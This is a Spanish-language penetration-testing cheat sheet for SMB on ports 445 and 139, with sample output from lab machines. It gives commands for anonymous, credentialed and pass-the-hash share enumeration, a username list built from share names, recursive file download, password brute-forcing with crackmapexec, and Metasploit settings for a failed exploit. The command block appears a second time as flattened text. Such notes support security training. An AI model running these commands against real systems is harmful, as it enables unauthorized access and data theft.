SMB - (445-139)

What is an SMB Port + Ports 445 and 139 ExplainedVaronis

Listado de carpetas

Comandos recomendables para listar carpetas con usuario anonymous, credenciales validas y utilizando la técnica de pass the hash.

$ smbmap -H 10.10.10.111
[+] Guest session       IP: 10.11.1.231:445     Name: 10.11.1.231                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        home                                                    READ ONLY       Home
        docs                                                    READ ONLY       docs
        tmp                                                     READ ONLY       TMP
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.2.10-Debian)
                                                                                                                                                                                            
$ smbclient \\\\10.10.10.111\\home
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
$ smb: \> dir
  .                                   D        0  Sun Dec 27 23:20:35 2015
  ..                                  D        0  Sun Dec 27 23:09:11 2015
  folder08                              D        0  Fri Jan  2 06:13:55 2015
  folder02                              D        0  Fri Jan  2 07:44:26 2015

$ smbclient --no-pass -L //10.10.10.111
$ smbmap -u invalid -H 10.10.10.111
[+] Guest session       IP: 10.10.10.111:445    Name: BLACKFIELD.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        
smbclient -U invalid //10.10.10.111/profiles\$
smbmap -H 192.168.0.1 [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H 192.168.0.1 [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H 192.168.0.1 [-P <PORT>] #Pass-the-Hash
crackmapexec smb 192.168.0.1 -u '' -p '' --shares #Null user
crackmapexec smb 192.168.0.1 -u 'username' -p 'password' --shares #Guest user
crackmapexec smb 192.168.0.1 -u 'username' -H '<HASH>' --shares #Guest user

nmap -p445 --script smb-vuln-*

# Validar version del SMB
crackmapexec smb 10.10.10.111

# Crear Diccionario apartir de nombres de carpetas de smb
smbclient -U invalid%invalid //10.10.10.111/profiles\$ -c ls | awk '{print $1}' > users.txt

# Filtrado de extension de ficheros con busqueda recursiva
smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -A '(xlsx|docx|txt|xml)' -R

#Obtener version de SMB
/smbver.sh 10.10.10.111 139  
10.10.10.111: UnixSamba 227a

Descarga recursiva de archivos y carpetas de SMB

smb: \> promp on
smb: \> recurse on
smb: \> mget *

Fuerza bruta con usuario de contraseña

crackmapexec smb 10.10.10.111 -u users.txt -p users.txt --continue-on-success

Solucionar Error con Metasploit

[-] 172.20.8.130:445 - Exploit failed: RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.
[*] Exploit completed, but no session was created.

## Solucion
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1

AnteriorPOP3 - 110 SiguienteDNS

Última actualización hace 3 años

$ smbmap -H 10.10.10.111 [+] Guest session IP: 10.11.1.231:445 Name: 10.11.1.231 Disk Permissions Comment ---- ----------- ------- home READ ONLY Home docs READ ONLY docs tmp READ ONLY TMP IPC$ NO ACCESS IPC Service (Samba 4.2.10-Debian) $ smbclient \\\\10.10.10.111\\home Enter WORKGROUP\root's password: Try "help" to get a list of possible commands. $ smb: \> dir . D 0 Sun Dec 27 23:20:35 2015 .. D 0 Sun Dec 27 23:09:11 2015 folder08 D 0 Fri Jan 2 06:13:55 2015 folder02 D 0 Fri Jan 2 07:44:26 2015 $ smbclient --no-pass -L //10.10.10.111 $ smbmap -u invalid -H 10.10.10.111 [+] Guest session IP: 10.10.10.111:445 Name: BLACKFIELD.local Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic NO ACCESS Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON NO ACCESS Logon server share profiles$ READ ONLY SYSVOL NO ACCESS Logon server share smbclient -U invalid //10.10.10.111/profiles\$ smbmap -H 192.168.0.1 [-P <PORT>] #Null user smbmap -u "username" -p "password" -H 192.168.0.1 [-P <PORT>] #Creds smbmap -u "username" -p "<NT>:<LM>" -H 192.168.0.1 [-P <PORT>] #Pass-the-Hash crackmapexec smb 192.168.0.1 -u '' -p '' --shares #Null user crackmapexec smb 192.168.0.1 -u 'username' -p 'password' --shares #Guest user crackmapexec smb 192.168.0.1 -u 'username' -H '<HASH>' --shares #Guest user nmap -p445 --script smb-vuln-* # Validar version del SMB crackmapexec smb 10.10.10.111 # Crear Diccionario apartir de nombres de carpetas de smb smbclient -U invalid%invalid //10.10.10.111/profiles\$ -c ls | awk '{print $1}' > users.txt # Filtrado de extension de ficheros con busqueda recursiva smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -A '(xlsx|docx|txt|xml)' -R #Obtener version de SMB /smbver.sh 10.10.10.111 139 10.10.10.111: UnixSamba 227a